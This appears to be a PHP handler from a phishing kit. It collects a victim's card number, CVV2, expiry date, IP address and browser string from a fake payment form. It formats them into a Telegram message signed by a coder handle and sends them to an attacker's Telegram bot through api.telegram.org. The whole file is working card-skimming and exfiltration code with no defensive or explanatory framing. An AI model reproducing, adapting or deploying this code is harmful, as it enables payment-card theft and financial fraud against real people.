<?php
error_reporting(0);
$e = htmlentities(strip_tags(htmlentities($_POST['e'])));
include "info.php";
$ip = $_SERVER["REMOTE_ADDR"];
$browser = $_SERVER['HTTP_USER_AGENT'];
//------------------------------------------------
$shcart = htmlentities(strip_tags(htmlentities($_POST['cardnumber'])));
$cvv2 = htmlentities(strip_tags(htmlentities($_POST['cvv2'])));
$year = htmlentities(strip_tags(htmlentities($_POST['year'])));
$month = htmlentities(strip_tags(htmlentities($_POST['month'])));
//---------------------------------------
$PinCard = str_replace(" ","-",$shcart);
//----------
$textmsg = "
╔⚠️Nᴇᴡ #OTP Rʀᴇᴄᴇɪᴠᴇᴅ
╠════════════
╠ 📩Cᴀʀᴅ Iɴғᴏʀᴍᴀᴛɪᴏɴ
║
╠🌇Cᴀʀᴅ ➣ <code>$shcart</code>
╠🎑Pᴀss ➣ <code>Sending Please Wiat . . .</code>
╠🌠Cᴠᴠ2 ➣ <code>$cvv2</code>
╠🌃Dᴀᴛᴇ ➣ <code>$year</code> : <code>$month</code>
╠════════════
╠ 🎉Hᴏʟᴅᴇʀ Iɴғᴏʀᴍᴀᴛɪᴏɴ
║
╠🌿iᴘ ➣ <code>$ip</code>
║
╠🎢Bʀᴏᴡsᴇʀ : <code>$browser</code>
║
╠🩸Coder ➣ @X405U7 
╠════════════
";
file_get_contents("https://api.telegram.org/bot$TOKEN/SendMessage?chat_id=$ID&parse_mode=html&text=".urlencode($textmsg));
?>
?>